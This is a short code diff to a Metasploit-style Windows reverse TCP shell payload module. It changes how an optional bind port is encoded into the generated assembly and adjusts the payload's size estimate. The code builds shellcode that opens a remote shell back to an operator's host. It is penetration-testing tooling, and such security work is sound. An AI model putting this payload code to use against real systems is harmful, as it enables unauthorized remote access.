@@ -27,7 +27,7 @@ module Payload::Windows::ReverseTcp
2727 #
2828 def initialize ( *args )
2929 super
30- register_advanced_options ( [ OptString . new ( 'PayloadBindPort' , [ false , 'Port to bind reverse tcp socket to on target system.' , '0' ] ) ] , self . class )
30+ register_advanced_options ( [ OptString . new ( 'PayloadBindPort' , [ false , 'Port to bind reverse tcp socket to on target system.' ] ) ] , self . class )
3131 end
3232
3333 #
@@ -87,6 +87,9 @@ def required_space
8787 # Start with our cached default generated size
8888 space = cached_size
8989
90+ # Bind port bytes, adds 35 bytes.
91+ space += 35
92+
9093 # EXITFUNK 'thread' is the biggest by far, adds 29 bytes.
9194 space += 29
9295
@@ -108,9 +111,6 @@ def required_space
108111 #
109112 def asm_reverse_tcp ( opts = { } )
110113
111- bind_port = opts [ :bind_port ]
112-
113- encoded_bind_port = "0x%.8x" % [ bind_port . to_i , 2 ] . pack ( "vn" ) . unpack ( "N" ) . first
114114 retry_count = [ opts [ :retry_count ] . to_i , 1 ] . max
115115 encoded_port = "0x%.8x" % [ opts [ :port ] . to_i , 2 ] . pack ( "vn" ) . unpack ( "N" ) . first
116116 encoded_host = "0x%.8x" % Rex ::Socket . addr_aton ( opts [ :host ] ||"127.127.127.127" ) . unpack ( "V" ) . first
@@ -158,7 +158,9 @@ def asm_reverse_tcp(opts={})
158158 xchg edi, eax ; save the socket for later, don't care about the value of eax after this
159159 ^
160160 # Check if a bind port was specified
161- if bind_port != 0
161+ if opts [ :bind_port ]
162+ bind_port = opts [ :bind_port ]
163+ encoded_bind_port = "0x%.8x" % [ bind_port . to_i , 2 ] . pack ( "vn" ) . unpack ( "N" ) . first
162164 asm << %Q^
163165 xor eax, eax
164166 push 11
0 commit comments